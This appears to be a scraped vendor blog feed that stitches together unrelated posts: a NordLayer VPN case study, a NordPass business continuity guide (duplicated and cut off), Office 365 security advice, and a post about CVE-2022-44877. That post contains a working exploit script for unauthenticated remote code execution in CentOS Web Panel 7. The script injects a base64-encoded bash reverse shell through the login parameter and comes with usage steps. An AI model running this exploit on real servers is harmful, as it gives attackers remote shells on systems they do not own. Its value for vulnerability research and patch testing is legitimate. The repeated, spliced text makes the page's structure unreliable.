How Hostinger onboarded a global remote team overnight with a 5-step plan
Hostinger is a hosting service provider for developers and their customers. With 1.2 million users worldwide and growing, the company works hard on improving customer support and continues updating its server technology for an even better customer experience. On the side, teams are fine-tuning home-designed hPanel, so the work there runs in a high pace environment.
To support business projects and a large customer base, Hostinger has several departments to maintain all the projects and services up and running. Therefore, originally based in Kaunas, Lithuania, the company now has an extensive team of over 1000 employees in 51 countries across the globe. Yet a large team brings its challenges in times of change. Egidijus Navardauskas, Head of Cybersecurity at Hostinger, gives his insider experience on their journey of implementing remote work in extreme situations.
The Challenge
Rapid organization onboarding to remote work during lockdown
Hostinger as most of the companies in the pre-pandemic time, lived a daily office-based life. However, it changed during Covid as all teams started working remotely and adjusting to the new way of living.
“Before the pandemic, we used to work from the office full time — there was no need for most of the teams to use an internal VPN solution except for a part of the IT staff.”
Once the lockdown period came into effect and workforce borders started expanding, the existing VPN solution limitations were revealed. It wasn’t initially built to scale sufficiently and provide a reliable VPN connection to handle the fast growth of remote employees in different countries.
The employee distribution and work from personal networks required the company to grant them a swift connection to internal resources. However, operational continuity was at high risk, and the current setup lacked role-based network access controls for maintaining security levels.
The Solution
Replace the existing VPN with a more agile solution
The employees used to work from the office all the time, and only a part of the IT staff was using an internal VPN solution as there was no need for most of the teams to access internal resources after working hours.
“As Hostinger had to move to a remote working model due to the pandemic and fast growth of remote employees in different counties, the existing VPN solution was not scalable enough to handle many users.”
Transitioning from an on-site environment to remote work quickly can be challenging for any business. Especially in the case of Hostinger, which experienced a sudden necessity to change its work and infrastructure approach.
Ad-hoc tasks are difficult to squeeze into tight schedules even in extreme circumstances, so time management and efficient distribution of resources are crucial — choosing the right solution from the first shoot is critical.
“Time shortage and lack of human resources, as all IT teams were very busy with their quarterly goals, were the additional factors that impacted the remote work situation.”
Therefore, the journey from identifying the issue, selecting a solution, and making the delivery had to be well-organized and smooth.
Why choose NordLayer?
NordLayer provided an optimal solution to change the existing company VPN and seamlessly integrate it into the current infrastructure.
Even though the requirements for a new VPN were extended to establish remote connections of the worldwide-distributed high number of employees to organizational resources and provide secure identity management measures to the IT administrators.
“NordLayer topped the shortlisted solutions by Hostinger by being the most cost-effective and easiest-to-manage option — this is how we chose the solution.”
When selecting a cybersecurity solution, Hostinger usually uses a risk-driven approach, and of course, the solution has to fulfill requirements that are suitable for our company’s needs. Following the practice ensures the organization’s main security goals, which are confidentiality, integrity, and availability of resources and data.
5 steps to onboard a global remote team overnight: decision-making process and proceeding with NordLayer
Clear steps and objectives helped Hostinger to optimize and streamline its process of problem-solving from understanding the current solution limitations — cannot scale with a growing team, what are the desired results — provide network access controls, meet compliance and security requirements, and provide backup servers, to overviewing the plan and implementing to the whole organization.
The Outcome
Fast adaptation to a crisis with extended security outcome
The company achieved a remote work setup on time, so business and team productivity weren’t affected. It all happened while facing a global lockdown with time and human resources limitations.
Today, all Hostinger employees use the solution daily as the team works in a hybrid model. We utilize ten private virtual gateways for our company needs — all this just having NordLayer and a 5-people cybersecurity team.
Most importantly, Hostinger employees can connect securely to internal resources no matter where they are. Moreover, the IT staff can focus more on other projects rather than maintaining internal VPN infrastructure — the service provider is responsible for the maintenance of the servers, so it saves a lot of valuable time.
Pro cybersecurity tips
The pandemic may start feeling like old news at some point the more time passes by, yet it was an unusual situation that had effects on businesses that reflect up to this day and will stay relevant in the future, like teaching to react to extreme situations to keep businesses running. Even though not everything can be foreseen, thus it’s beneficial to have a strategy and a sound plan in place to be well-prepared.
It’s good to start even from small things — Head of Cybersecurity of Hostinger Egidijus Navardauskas shares his tips for business security:
Have you considered how your organization would hold if stress-tested? What would be the main impediments to securing business continuity? Even expected challenges can bring to light lacking security and adoption of implemented infrastructure. Therefore, it’s always worth exploring the possibilities and performing crisis drills even on paper — be ready to ensure teams and organization perforation despite the work setup, and reach out to learn more about a remote access network solution for modern companies.
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
These days, cybercrime is rampant. It’s no longer a matter of “if” you’re going to suffer an attack but “when” it will happen. All companies want to be ready for any crisis. And this is where a business continuity plan comes into play.
But what is a business continuity plan exactly? Why is it important? What should one include? Today, we’re exploring all these questions in-depth.
What is a business continuity plan?
A business continuity plan (BCP) is a document that sets guidelines for how an organization will continue its operations in the event of a disruption, whether it’s a fire, flood, other natural disaster or a cybersecurity incident. A BCP aims to help organizations resume operations without significant downtime.
Unfortunately, according to a 2020 Mercer survey, 51% of businesses across the globe don’t have a business continuity plan in place.
What’s the difference between business continuity and disaster recovery plans?
We often confuse the terms business continuity plan and disaster recovery plan. The two overlap and often work together, but the disaster recovery plan focuses on containing, examining, and restoring operations after a cyber incident. On the other hand, BCP is a broader concept that considers the whole organization. A business continuity plan helps organizations stay prepared for dealing with a potential crisis and usually encompasses a disaster recovery plan.
Importance of business continuity planning
The number of news headlines announcing data breaches has numbed us to the fact that cybercrime is very real and frequent and poses an existential risk to companies of all sizes and industries.
Consider that in 2021, approximately 37% of global organizations fell victim to a ransomware attack. Then consider that business interruption and restoration costs account for 50% of cyberattack-related losses. Finally, take into account that most cyberattacks are financially motivated and the global cost of cybercrime topped $6 trillion last year. The picture is quite clear — cybercrime is a lucrative venture for bad actors and potentially disastrous for those on the receiving end.
To thrive in these unpredictable times, organizations go beyond conventional security measures. Many companies develop a business continuity plan parallel to secure infrastructure and consider the plan a critical part of the security ecosystem. The Purpose of a business continuity plan is to significantly reduce the downtime in an emergency and, in turn, reduce the potential reputational damage and — of course — revenue losses.
Business continuity plan template
Password security for your business
Store, manage and share passwords.
30-day money-back guarantee
Business Continuity Plan Example
[Company Name]
[Date]
I. Introduction
Purpose of the Plan
Scope of the Plan
Budget
Timeline
The initial stage of developing a business continuity plan starts with a statement of the plan’s purpose, which explains the main objective of the plan, such as ensuring the organization’s ability to continue its operations during and after a disruptive event.
The Scope of the Plan outlines the areas or functions that the plan will cover, including business processes, personnel, equipment, and technology.
The Budget specifies the estimated financial resources required to implement and maintain the BCP. It includes costs related to technology, personnel, equipment, training, and other necessary expenses.
The Timeline provides a detailed schedule for developing, implementing, testing, and updating the BCP.
II. Risk Assessment
Identification of Risks
Prioritization of Risks
Mitigation Strategies
The Risk Assessment section of a Business Continuity Plan (BCP) is an essential part of the plan that identifies potential risks that could disrupt an organization’s critical functions.
The Identification of Risks involves identifying potential threats to the organization, such cybersecurity breaches, supply chain disruptions, power outages, and other potential risks. This step is critical to understand the risks and their potential impact on the organization.
Once the risks have been identified, the Prioritization of Risks follows, which helps determine which risks require the most attention and resources.
The final step in the Risk Assessment section is developing Mitigation Strategies to minimize the impact of identified risks. Mitigation strategies may include preventative measures, such as system redundancies, data backups, cybersecurity measures, as well as response and recovery measures, such as emergency protocols and employee training.
III. Emergency Response
Emergency Response Team
Communication Plan
Emergency Procedures
This section of the plan focuses on immediate actions that should be taken to ensure the safety and well-being of employees and minimize the impact of the event on the organization’s operations.
The Emergency Response Team is responsible for managing the response to an emergency or disaster situation. This team should be composed of individuals who are trained in emergency response procedures and can act quickly and decisively during an emergency. The team should also include a designated leader who is responsible for coordinating the emergency response efforts.
The Communication Plan outlines how information will be disseminated during an emergency situation. It includes contact information for employees, stakeholders, and emergency response personnel, as well as protocols for communicating with these individuals.
The Emergency Procedures detail the steps that should be taken during an emergency or disaster situation. The emergency procedures should be developed based on the potential risks identified in the Risk Assessment section and should be tested regularly to ensure that they are effective.
IV. Business Impact Analysis
The Business Impact Analysis (BIA) section of a Business Continuity Plan (BCP) is a critical step in identifying the potential impact of a disruption to an organization’s critical operations.
The Business Impact Analysis is typically conducted by a team of individuals who understand the organization’s critical functions and can assess the potential impact of a disruption to those functions. The team may include representatives from various departments, including finance, operations, IT, and human resources.
V. Recovery and Restoration
Procedures for recovery and restoration of critical processes
Prioritization of recovery efforts
Establishment of recovery time objectives
The Recovery and Restoration section of a Business Continuity Plan (BCP) outlines the procedures for recovering and restoring critical processes and functions following a disruption.
The Procedures for recovery and restoration of critical processes describe the steps required to restore critical processes and functions following a disruption. This may include steps such as relocating to alternate facilities, restoring data and systems, and re-establishing key business relationships.
The Prioritization section of the plan identifies the order in which critical processes will be restored, based on their importance to the organization’s operations and overall mission.
Recovery time objectives (RTOs) define the maximum amount of time that critical processes and functions can be unavailable following a disruption. Establishing RTOs ensures that recovery efforts are focused on restoring critical functions within a specific timeframe.
VI. Plan Activation
Plan Activation Procedures
The Plan Activation section is critical in ensuring that an organization can quickly and effectively activate the plan and respond to a potential emergency.
The Plan Activation Procedures describe the steps required to activate the BCP in response to a disruption. The procedures should be clear and concise, with specific instructions for each step to ensure a prompt and effective response.
VII. Testing and Maintenance
Testing Procedures
Maintenance Procedures
Review and Update Procedures
This section of the plan is critical to ensure that an organization can effectively respond to disruptions and quickly resume its essential functions.
Testing procedures may include scenarios such as natural disasters, cyber-attacks, and other potential risks. The testing procedures should include clear objectives, testing scenarios, roles and responsibilities, and evaluation criteria to assess the effectiveness of the plan.
The Maintenance Procedures detail the steps necessary to keep the BCP up-to-date and relevant.
The Review and Update Procedures describe how the BCP will be reviewed and updated regularly to ensure its continued effectiveness. This may involve conducting a review of the plan on a regular basis or after significant changes to the organization’s operations or threats.
What should a business continuity plan checklist include?
Organizations looking to develop a BCP have more than a few things to think through and consider. Variables such as the size of the organization, its IT infrastructure, personnel, and resources all play a significant role in developing a continuity plan. Remember, each crisis is different, and each organization will have a view on handling it according to all the variables in play. However, all business continuity plans will include a few elements in one way or another.
Clearly defined areas of responsibility
A BCP should define specific roles and responsibilities for cases of emergency. Detail who is responsible for what tasks and clarify what course of action a person in a specific position should take. Clearly defined roles and responsibilities in an emergency event allow you to act quickly and decisively and minimize potential damage.
Crisis communication plan
In an emergency, communication is vital. It is the determining factor when it comes to crisis handling. For communication to be effective, it is critical to establish clear communication pipelines. Furthermore, it is crucial to understand that alternative communication channels should not be overlooked and outlined in a business continuity plan.
Recovery teams
A recovery team is a collective of different professionals who ensure that business operations are restored as soon as possible after the organization confronts a crisis.
Alternative site of operations
Today, when we think of an incident in a business environment, we usually think of something related to cybersecurity. However, as discussed earlier, a BCP covers many possible disasters. In a natural disaster, determine potential alternate sites where the company could continue to operate.
Backup power and data backups
Whether a cyber event or a real-life physical event, ensuring that you have access to power is crucial if you wish to continue operations. In a BCP, you can often come across lists of alternative power sources such as generators, where such tools are located, and who should oversee them. The same applies to data. Regularly scheduled data backups can significantly reduce potential losses incurred by a crisis event.
Recovery guidelines
If a crisis is significant, a comprehensive business continuity plan usually includes detailed guidelines on how the recovery process will be carried out.
Business continuity planning steps
Here are some general guidelines that an organization looking to develop a BCP should consider:
Analysis
A business continuity plan should include an in-depth analysis of everything that could negatively affect the overall organizational infrastructure and operations. Assessing different levels of risk should also be a part of the analysis phase.
Design and development
Once you have a clear overview of potential risks your company could face, start developing a plan. Create a draft and reassess it to see if it takes into account even the smallest of details.
Implementation
Implement BCP within the organization by providing training sessions for the staff to get familiar with the plan. Getting everyone on the same page regarding crisis management is critical.
Testing
Rigorously test the plan. Play out a variety of scenarios in training sessions to learn the overall effectiveness of the continuity plan. By doing so, everyone on the team will be closely familiar with the business continuity plan’s guidelines.
Maintenance and updating
Because the threat landscape constantly changes and evolves, you should regularly reassess your BCP and take steps to update it. By making your continuity plan in tune with the times, you will be able to stay a step ahead of a crisis.
Level up your company’s security with NordPass Business
A comprehensive business continuity plan is vital for the entire organization’s security posture. However, in a perfect world, you wouldn’t have to use it. This is where NordPass Business can help.
Remember, weak, reused, or compromised passwords are often cited as one of the top contributing factors in data breaches. It’s not surprising, considering that an average user has around 100 passwords. Password fatigue is real and significantly affects how people treat their credentials. NordPass Business counters these issues.
With NordPass Business, your team will have a single secure place to store all work-related passwords, credit cards, and other sensitive information. Accessing all the data stored in NordPass is quick and easy, which allows your employees not to be distracted by the task of finding the correct passwords for the correct account.
In cyber incidents, NordPass Business ensures that company credentials remain secure at all times. Everything stored in the NordPass vault is secured with advanced encryption algorithms, which would take hundreds of years to brute force.
If you are interested in learning more about NordPass Business and how it can fortify corporate security, do not hesitate to book a demo with our representative.
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About NordPass
NordPass is developed by Nord Security, a company leading the global market of cybersecurity products.
The web has become a chaotic space where safety and trust have been compromised by cybercrime and data protection issues. Therefore, our team has a global mission to shape a more trusted and peaceful online future for people everywhere.
Unique exploit: CVE-2022–44877 Exploitation Tool
Here is the exploitation script of the Centos Web Panel 7 — CWP Unauthenticated RCE CVE-2022–44877
The script from here:
https://github.com/mhzcyber/CVE-Analysis/blob/main/CVE-2022%E2%80%9344877/CVE-2022-44877Exploit.sh
How to use the exploitation script:
Run listener:
Make the script executable:
chmod +x CVE-2022-44877Exploit.sh
Run the script:
./CVE-2022-44877Exploit.sh https://192.168.1.108:2031/ root 192.168.1.103 9001
Now we received a connection:
You can watch the exploitation script video here:
Code Explanation:
#!/bin/bash
function help {
echo "[-] USAGE: $0 Target_URL Target_username LHOST LPORT"
echo "[-] Example: $0 https://192.168.1.108:2031/ root 192.168.1.100 9001"
exit 1
}
function exploit {
target_url=$1
target_un=$2
lhost=$3
lport=$4
payload="sh -i >& /dev/tcp/${lhost}/${lport} 0>&1"
payload_base64=$(echo -n ${payload} | base64)
target_ip=$(egrep -o '([0-9]{1,3}[.]){3}[0-9]{1,3}' <<< ${target_url})
echo $target_ip
port=$(echo ${target_url} | grep -oP ':\K\d+')
echo $port
curl -i -s -k -X $'POST' \
-H $'Host: '${target_ip}':'${port} \
-H $'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'username='${target_un}'&password=test&commit=Login' \
-g ${target_url}'login/index.php?login=$(echo${IFS}'${payload_base64}'${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)'
}
if [[ $# -eq 4 ]]; then
exploit "$1" "$2" "$3" "$4"
else
help
fiThis script has two main functions: help and exploit.
The help function will be called if the user does not provide the correct number of arguments when running the script. It will display usage information and an example of how to run the script.
The exploit function takes four arguments: the target URL, the target username, the local host IP address, and the local port number.
First,
- the script defines the payload, which is a command that creates a reverse shell.
- The payload is then encoded in base64.
- It then extracts the target IP address from the URL and port number,
- and uses the
curlcommand to send a HTTP post request to the target with the payload in thelogin=parameter. - The payload is executed on the target server by base64 decoding the payload first and then running the command in bash.
#exploitation #tool #CVE-2022-44877
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.
Microsoft Office 365 security best practices for business
Office 365 is a popular business platform worldwide. Its blend of collaboration tools, office apps, and cloud storage components makes Office 365 a go-to option for many companies. But the popularity of Office also makes it a popular target for cyber-attackers.
Securing data and protecting assets is critically important when using Office 365. This blog will discuss the major threats faced by users and we will suggest some security best practices. Office 365 is a safe place to run business operations. But you need awareness and policies to make that safety a reality.
How secure is Office 365?
Office 365 is a suite of cloud-based business tools. Like all cloud applications and platforms, Office is vulnerable to external attackers. Cyber-attackers can breach user defenses. They can access sensitive data, disrupt operations, and cause plenty of damage before they are stopped.
Security concerns are real. Up to 85% of organizations using Office 365 suffered an email data loss in 2021. 15% of organizations using the platform suffered more than 500 breaches in the same year. Just 4% of organizations not using Office 365 reported the same data breach frequency.
Microsoft has toughened Office security features in the past few years. However, Office 365 users still need to control their security posture. If you can find a secure configuration that meets your needs, you can use the platform safely. The first step in doing so is mastering the security features supplied by Microsoft.
Security features in Office 365
Users can access most Office 365 security features via the Security and Compliance Center on Microsoft Accounts. This cloud-based portal allows users to choose several critical security functions. These functions include:
1. Identity and Access Management (IAM)
Microsoft’s IAM solution lets you set up digital identities for all Office users.
Every user has a digital identity containing their authentication details and authorization information. This lets administrators add adaptive multi-factor authentication for all log-ins. Admins can manage passwords efficiently, onboard and remove users as needed.
IAM also allows you to manage authorization options for all users. Admins can set privileges based on roles or individual requirements. This limits app access to users with appropriate permissions. Unauthorized outsiders won’t be able to intrude.
2. Information security
With Microsoft Information Protection (MIP), users can manage data as it travels across Office cloud resources and even on remote work devices.
Users can classify data to ensure it only reaches authorized devices. Set different sensitivity levels to make data available or defend it as required.
Classification works alongside Data Loss Prevention (DLP) and Microsoft Information Governance (MIG) tools. Create robust security controls for confidential data, and set lifecycle controls to delete data when it is not needed.
3. Threat defenses
Microsoft offers Office-native Security Information and Event Management (SIEM) and Extended Detection and Response (XDR) features. Together, they neutralize cyber threats and track traffic to assess security weaknesses.
Azure Sentinel is a SIEM system that uses Artificial Intelligence to monitor the Office environment. Sentinel can track every active Office application and device. Security teams benefit from real-time visibility across the threat surface.
Azure Defender and Office 365 Defender are XDR tools. They extend threat detection to all endpoints, including email accounts and cloud applications.
4. Risk management
Office 365 includes a suite of tools to manage risks and ensure compliance. These tools identify and classify risks, focusing on data protection across an Office 365 environment.
Risk management tools allow security teams to assess insider threats, manage the risk of insecure communications, and fine-tune privileges for admin accounts. Audit tools let you drill down into compliance issues until every data security weakness is covered.
What are the most important Office 365 security concerns?
The security tools above are comprehensive and flexible. But they are generally voluntary. Users need to create their own security setup and choose measures that fit their Office implementation.
Office 365 leaves plenty of room for misconfigurations. And these gaps are the ideal space for attackers to work. Here are some critical threats for security managers to assess:
1. Credential theft and unauthorized access
Cyber attackers may gain access to your entire Office 365 environment if they steal user credentials. Users can leak credentials in many ways. For instance, employees could:
Share information insecurely via Office collaboration apps
Click on attachments that extract personal data
Follow unsafe links in social engineering email messages
Install malware onto a connected device
Credential theft is a constant security concern for Office 365 managers. Office does include multi-factor authentication, but MFA is not enabled as a default. Many companies forget to apply extra authentication and suffer as a result.
2. Unsafe privileges
According to Zero Trust principles, Office 365 users should have access to the resources they need and nothing more. Limiting access to sensitive data makes data extraction and loss less likely. Hackers cannot freely access data. Employees won’t be able to leak data during their tasks accidentally.
However, privileges creep can lead to too many people having access to too much data. By default, every Global Administrator Account has extensive privileges. Security teams need to restrict admin accounts manually. This potentially leaves scope to abuse access and steal data.
3. Data loss
Data breaches are a nightmare scenario for Office 365 managers, but they are possible without adequate security controls.
The major problem here is sharing. Office is built to enable information exchange. Workers share documents, conversations, databases, and much more. This is great at an operational level. But the flow of data is a security problem.
Data can leak via many storage locations or sharing tools. Employees may not know about data sharing risks or how to store data securely. And data can pass to unauthorized third parties without the knowledge of security teams.
4. Complacency
Many companies move from on-premises Office implementations to cloud-based 365 environments. While the applications are familiar, the security context of these two setups is very different.
Security managers may lack visibility of all cloud endpoints and in-use applications. They may lose sight of data containers or fail to turn on necessary security features. Sharing tools like SharePoint present new risks, such as allowing access for third-party guests. But these new risks aren’t always detected during cloud transitions.
Office 365 security best practices for business
What can businesses do about the security threats listed above? The answer lies in applying Office 365 security best practices. By following these security practices, you can enjoy the benefits of information sharing and keeping data safe.
1. Enable IAM
Access management is the top priority when securing Office 365 environments. Companies must create a secure perimeter and restrict access for unauthenticated users. Users should have the privileges they need to carry out work, but no more access than they require.
Office 365 has built-in IAM tools to control authentication and authorization centrally. Set conditional access policies for every role and back up password access with MFA technologies. Bring all Office 365 apps together via Single Sign On (SSO). This makes it easier for employees to manage passwords. It also simplifies access management for security professionals.
It is advisable to create separate user accounts for admins with elevated privileges. Every admin account requires maximum protection. Users should only use administrative accounts for specialist tasks, and rely on other accounts for everyday work.
2. Educate users to understand Office 365 security
Employees must know how to avoid phishing attacks. Build anti-phishing training into all onboarding processes and refresh this knowledge regularly. Workers should always be aware of dangerous email attachments and how to spot malicious links.
Users also require training in how to share information securely. Educate staff on how to use SharePoint and Teams without compromising security.
3. Collaborate securely
Education combines with robust collaboration app security to protect data in-transit. Install DLP systems to track sensitive files and ensure they stay within the network perimeter. DLP will alert managers if employees share critical data, and block any illegitimate transfers.
Set up Message Encryption on Teams and other communication tools. This protects the content of messages. Only authorized users will be able to read messages or open files.
Use Safe Attachments to scan all email attachments and shared files. Extend attachment protection to Teams, SharePoint and OneDrive so that all potential endpoints enjoy security coverage.
4. Put in place anti-phishing protections
Office 365 includes specialist tools to handle phishing attacks. These advanced threat protection tools go beyond trusting employees not to open malicious links. They actively inspect emails to detect malicious content.
For example, users can sandbox attachments automatically with Application Guard. This creates a protected environment to open pdfs or spreadsheets. Application Guard scans files to detect unsafe sources. This matters because Office files are common attack vectors. Sandboxing makes it much less likely that an innocent document will spark a security alert.
Safe Links is another useful anti-phishing tool that scans URLs to detect security concerns. And you can set “external” email tagging for inbound messages. This alerts users to be careful when opening external communications.
These measures do not remove all phishing risks. Zero-day threats are still an issue. But together, Application Guard, email tagging and Safe Links provide plenty of defense against social engineering attacks.
5. Use anti-malware solutions
When anti-phishing measures fail, malware protection tools enter the picture. Office 365 users should take advantage of Microsoft’s anti-malware tools wherever possible.
Implement SIEM protection via Azure Sentinel, and use XDR to scan all endpoints. These two tools work together to detect malware infections and quarantine affected files. This should neutralize ransomware attacks before they take down network infrastructure.
6. Strengthen your password policies
User access is the major Office 365 security weak point. And credential theft is the most common attack vector. Make it harder to mount credential stuffing attacks by enforcing strong password policies across all users.
Make sure Office users avoid real names and familiar words. Include multiple symbols and numbers, in combinations that are impossible to anticipate. Use password manager tools to store and update passwords. This reduces the risk of human error.
Generally, make sure users do not reuse passwords from other network assets. Every Office 365 user requires unique credentials, with no exceptions.
7. Strengthen data security controls
Employ MIP to lock down sensitive information and allow access to less important data. Office 365 lets you label sensitive information such as personally identifiable information (PII) and financial records. These labels enforce tools to keep sensitive data secure, such as encryption or watermarking.
DLP also allows you to track data movements and prevent data leaving organizational boundaries. This makes it easier to work remotely without creating additional data loss risks.
8. Check compliance and security scores
Data security measures aim to meet strict compliance goals. For instance, you may need to protect financial records to comply with PCI-DSS, or meet HIPAA rules when handling patient details. Microsoft has created tools to make the compliance task easier, so use them when available.
The Office 365 compliance portal provides guidance for meeting important regulations. It also includes a compliance score that charts your progress. Updated in real-time, the compliance score suggests required actions. It provides a useful road map to compliance across all Office 365 services.
Office also provides an overall Secure Score. This can be found in the Security Center, which records a percentage based on an organization’s security posture. Adding extra security measures boosts the score, and the system delivers recommendations based on your Office 365 setup.
9. Optimize mobile device security
Employees may use mobile devices to access Microsoft’s SaaS applications. This particularly applies to companies with large communities of remote workers or BYOD setups. In any case, it is advisable to implement Mobile Device Management (MDM) security solutions,
Office 365’s MDM tools encrypt confidential data on mobile devices. They can wipe data from devices in the event of theft. And they prevent network access for stolen or compromised devices.
10. Put in place rock-solid Office auditing
Be sure to enable the Unified Audit Log via the Office 365 Security Center. The UAL lets you track user activity across all accounts. You can see who is sharing information and how that information spreads across your cloud environment.
By default, audit logs provide 90 days of historical information, which isn’t that much. However, you can extend the scope of audit logging to as long as ten years if desired. Longer periods provide a better evidence base for compliance management, but you will need measures to efficiently store and search audit data.
Ensure secure access to Office 365 with NordLayer
Collaborate, strategize, and store data safely with our office 365 security best practices. On-board security tools and solid staff education let you use Microsoft’s business environment without creating unnecessary risks.
However, just relying on Office 365 controls is a risky move. That’s especially true for companies with hybrid cloud environments who manage multiple platforms and require secure access to SaaS apps. In those cases, it makes sense to apply enterprise-wide security solutions like NordLayer.
NordLayer’s IP allowlisting tools supplement Office 365 security controls. Admins can define a list of authorized addresses. These IP addresses are then permitted access to Office resources. Unlisted devices are excluded or require additional verification.
NordLayer encrypts traffic passing between employee devices and Office 365, countering man-in-the-middle style attacks. Threatblock also blocks malicious websites, reducing the risks posed by phishing attacks. Use Microsoft’s internal features to secure Office 365. But go further, integrating Office into your wider cybersecurity setup. To find out more, contact the NordLayer team today.
About Version 2
Version 2 is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.
These days, cybercrime is rampant. It’s no longer a matter of “if” you’re going to suffer an attack but “when” it will happen. All companies want to be ready for any crisis. And this is where a business continuity plan comes into play.
But what is a business continuity plan exactly? Why is it important? What should one include? Today, we’re exploring all these questions in-depth.
What is a business continuity plan?
A business continuity plan (BCP) is a document that sets guidelines for how an organization will continue its operations in the event of a disruption, whether it’s a fire, flood, other natural disaster or a cybersecurity incident. A BCP aims to help organizations resume operations without significant downtime.
Unfortunately, according to a 2020 Mercer survey, 51% of businesses across the globe don’t have a business continuity plan in place.
What’s the difference between business continuity and disaster recovery plans?
We often confuse the terms business continuity plan and disaster recovery plan. The two overlap and often work together, but the disaster recovery plan focuses on containing, examining, and restoring operations after a cyber incident. On the other hand, BCP is a broader concept that considers the whole organization. A business continuity plan helps organizations stay prepared for dealing with a potential crisis and usually encompasses a disaster recovery plan.
Importance of business continuity planning
The number of news headlines announcing data breaches has numbed us to the fact that cybercrime is very real and frequent and poses an existential risk to companies of all sizes and industries.
Consider that in 2021, approximately 37% of global organizations fell victim to a ransomware attack. Then consider that business interruption and restoration costs account for 50% of cyberattack-related losses. Finally, take into account that most cyberattacks are financially motivated and the global cost of cybercrime topped $6 trillion last year. The picture is quite clear — cybercrime is a lucrative venture for bad actors and potentially disastrous for those on the receiving end.
To thrive in these unpredictable times, organizations go beyond conventional security measures. Many companies develop a business continuity plan parallel to secure infrastructure and consider the plan a critical part of the security ecosystem. The Purpose of a business continuity plan is to significantly reduce the downtime in an emergency and, in turn, reduce the potential reputational damage and — of course — revenue losses.
Business continuity plan template
Password security for your business
Store, manage and share passwords.
30-day money-back guarantee
Business Continuity Plan Example
[Company Name]
[Date]
I. Introduction
Purpose of the Plan
Scope of the Plan
Budget
Timeline
The initial stage of developing a business continuity plan starts with a statement of the plan’s purpose, which explains the main objective of the plan, such as ensuring the organization’s ability to continue its operations during and after a disruptive event.
The Scope of the Plan outlines the areas or functions that the plan will cover, including business processes, personnel, equipment, and technology.
The Budget specifies the estimated financial resources required to implement and maintain the BCP. It includes costs related to technology, personnel, equipment, training, and other necessary expenses.
The Timeline provides a detailed schedule for developing, implementing, testing, and updating the BCP.
II. Risk Assessment
Identification of Risks
Prioritization of Risks
Mitigation Strategies
The Risk Assessment section of a Business Continuity Plan (BCP) is an essential part of the plan that identifies potential risks that could disrupt an organization’s critical functions.
The Identification of Risks involves identifying potential threats to the organization, such cybersecurity breaches, supply chain disruptions, power outages, and other potential risks. This step is critical to understand the risks and their potential impact on the organization.
Once the risks have been identified, the Prioritization of Risks follows, which helps determine which risks require the most attention and resources.
The final step in the Risk Assessment section is developing Mitigation Strategies to minimize the impact of identified risks. Mitigation strategies may include preventative measures, such as system redundancies, data backups, cybersecurity measures, as well as response and recovery measures, such as emergency protocols and employee training.
III. Emergency Response
Emergency Response Team
Communication Plan
Emergency Procedures
This section of the plan focuses on immediate actions that should be taken to ensure the safety and well-being of employees and minimize the impact of the event on the organization’s operations.
The Emergency Response Team is responsible for managing the response to an emergency or disaster situation. This team should be composed of individuals who are trained in emergency response procedures and can act quickly and decisively during an emergency. The team should also include a designated leader who is responsible for coordinating the emergency response efforts.
The Communication Plan outlines how information will be disseminated during an emergency situation. It includes contact information for employees, stakeholders, and emergency response personnel, as well as protocols for communicating with these individuals.
The Emergency Procedures detail the steps that should be taken during an emergency or disaster situation. The emergency procedures should be developed based on the potential risks identified in the Risk Assessment section and should be tested regularly to ensure that they are effective.
IV. Business Impact Analysis
The Business Impact Analysis (BIA) section of a Business Continuity Plan (BCP) is a critical step in identifying the potential impact of a disruption to an organization’s critical operations.
The Business Impact Analysis is typically conducted by a team of individuals who understand the organization’s critical functions and can assess the potential impact of a disruption to those functions. The team may include representatives from various departments, including finance, operations, IT, and human resources.
V. Recovery and Restoration
Procedures for recovery and restoration of critical processes
Prioritization of recovery efforts
Establishment of recovery time objectives
The Recovery and Restoration section of a Business Continuity Plan (BCP) outlines the procedures for recovering and restoring critical processes and functions following a disruption.
The Procedures for recovery and restoration of critical processes describe the steps required to restore critical processes and functions following a disruption. This may include steps such as relocating to alternate facilities, restoring data and systems, and re-establishing key business relationships.
The Prioritization section of the plan identifies the order in which critical processes will be restored, based on their importance to the organization’s operations and overall mission.
Recovery time objectives (RTOs) define the maximum amount of time that critical processes and functions can be unavailable following a disruption. Establishing RTOs ensures that recovery efforts are focused on restoring critical functions within a specific timeframe.
VI. Plan Activation
Plan Activation Procedures
The Plan Activation section is critical in ensuring that an organization can quickly and effectively activate the plan and respond to a potential emergency.
The Plan Activation Procedures describe the steps required to activate the BCP in response to a disruption. The procedures should be clear and concise, with specific instructions for each step to ensure a prompt and effective response.
VII. Testing and Maintenance
Testing Procedures
Maintenance Procedures
Review and Update Procedures
This section of the plan is critical to ensure that an organization can effectively respond to disruptions and quickly resume its essential functions.
